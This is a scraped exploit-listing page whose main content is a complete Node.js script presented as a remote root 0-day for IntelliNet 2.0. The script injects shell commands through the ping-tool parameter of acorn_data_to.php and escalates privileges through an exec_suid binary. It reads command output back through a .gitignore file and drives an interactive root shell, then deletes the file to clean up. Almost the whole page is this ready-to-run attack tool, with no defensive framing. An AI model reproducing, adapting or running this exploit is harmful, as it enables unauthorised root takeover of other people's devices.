IntelliNet 2.0 Remote Root Exploit exploit

2 months ago 37
BOOK THIS SPACE FOR AD
ARTICLE AD

Share

## https://sploitus.com/exploit?id=1337DAY-ID-39743 #!/usr/local/bin/node const { execSync } = require('child_process'); const readline = require('readline'); let TARGET = ''; let COMMAND = ''; let SESSION = ''; const ESCALATE = '/usr/aes/bin/exec_suid'; console.log(` ⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⡀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀ ⠀⠀⠀⠀⠀⠀⠀⠀⠀⢠⣾⡄⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀ ⠀⠀⠀⠀⠀⠀⠀⠀⢀⣼⣿⣧⣶⣶⣶⣦⣤⣀⡀⠀⠀⠀⠀⠀⠀⠀⠀⠀ ⠀⠀⠀⠀⠀⠀⣠⣾⢿⣿⣿⣿⣏⠉⠉⠛⠛⠿⣷⣕⠀⠀⠀⠀⠀⠀⠀⠀ ⠀⠀⠀⠀⣠⣾⢝⠄⢀⣿⡿⠻⣿⣄⠀⠀⠀⠀⠈⢿⣧⡀⣀⣤⡾⠀⠀⠀ ⠀⠀⠀⢰⣿⡡⠁⠀⠀⣿⡇⠀⠸⣿⣾⡆⠀⠀⣀⣤⣿⣿⠋⠁⠀⠀⠀⠀ ⠀⠀⢀⣷⣿⠃⠀⠀⢸⣿⡇⠀⠀⠹⣿⣷⣴⡾⠟⠉⠸⣿⡇⠀⠀⠀⠀⠀ ⠀⠀⢸⣿⠗⡀⠀⠀⢸⣿⠃⣠⣶⣿⠿⢿⣿⡀⠀⠀⢀⣿⡇⠀⠀⠀⠀⠀ ⠀⠀⠘⡿⡄⣇⠀⣀⣾⣿⡿⠟⠋⠁⠀⠈⢻⣷⣆⡄⢸⣿⡇⠀⠀⠀⠀⠀ ⠀⠀⠀⢻⣷⣿⣿⠿⣿⣧⠀⠀⠀⠀⠀⠀⠀⠻⣿⣷⣿⡟⠀⠀⠀⠀⠀⠀ ⢀⣰⣾⣿⠿⣿⣿⣾⣿⠇⠀⠀⠀⠀⠀⠀⠀⢀⣼⣿⣿⣅⠀⠀⠀⠀⠀⠀ ⠀⠰⠊⠁⠀⠙⠪⣿⣿⣶⣤⣄⣀⣀⣀⣤⣶⣿⠟⠋⠙⢿⣷⡄⠀⠀⠀⠀ ⠀⠀⠀⠀⠀⠀⢀⣿⡟⠺⠭⠭⠿⠿⠿⠟⠋⠁⠀⠀⠀⠀⠙⠏⣦⠀⠀⠀ ⠀⠀⠀⠀⠀⠀⢸⡟⠃⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀ ⠀⠀⠀⠀⠀⠀⠀⠁⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀ ╔════════════════════════════════════════════╗ ║ IntelliNet 2.0 Remote Root Exploit (0-Day) ║ ║ Author: Jean Pereira <[email protected]> ║ ╚════════════════════════════════════════════╝ `); const cleanUp = () => { execSync( `curl -sL "http://${TARGET}/acorn_data_to.php?cmd=ping-tool&pingAddress=127.0.0.1;rm%20.gitignore;"` ); }; const createShell = (cmd) => { execSync( `curl -sL "http://${TARGET}/acorn_data_to.php?cmd=ping-tool&pingAddress=127.0.0.1;${encodeURIComponent( [ESCALATE, cmd].join(' ') )}%20%3E%20.gitignore;"` ); return execSync(`curl -sL "http://${TARGET}/.gitignore"`).toString().trim(); }; const rl = readline.createInterface({ input: process.stdin, output: process.stdout, }); const interactiveShell = () => { rl.question(`root@${SESSION.slice(8)}:~# `, (currentCommand) => { if (currentCommand.trim() === '!q') { console.log('Cleaning up...'); cleanUp(); rl.close(); } else { COMMAND = currentCommand; let output = createShell(COMMAND); console.log(output); interactiveShell(); } }); }; rl.question('[*] Enter target IP: ', (targetIP) => { TARGET = targetIP; SESSION = createShell('echo a1b2c3d4$HOSTNAME'); if (!SESSION.startsWith('a1b2c3d4')) { console.log('[*] Could not execute payload, aborting'); process.exit(0); } else { console.log('[*] Payload injected to firmware'); console.log('[*] Launching root shell via exec_suid'); } console.log(''); interactiveShell(); }); rl.on('close', () => { process.exit(0); });
Read Entire Article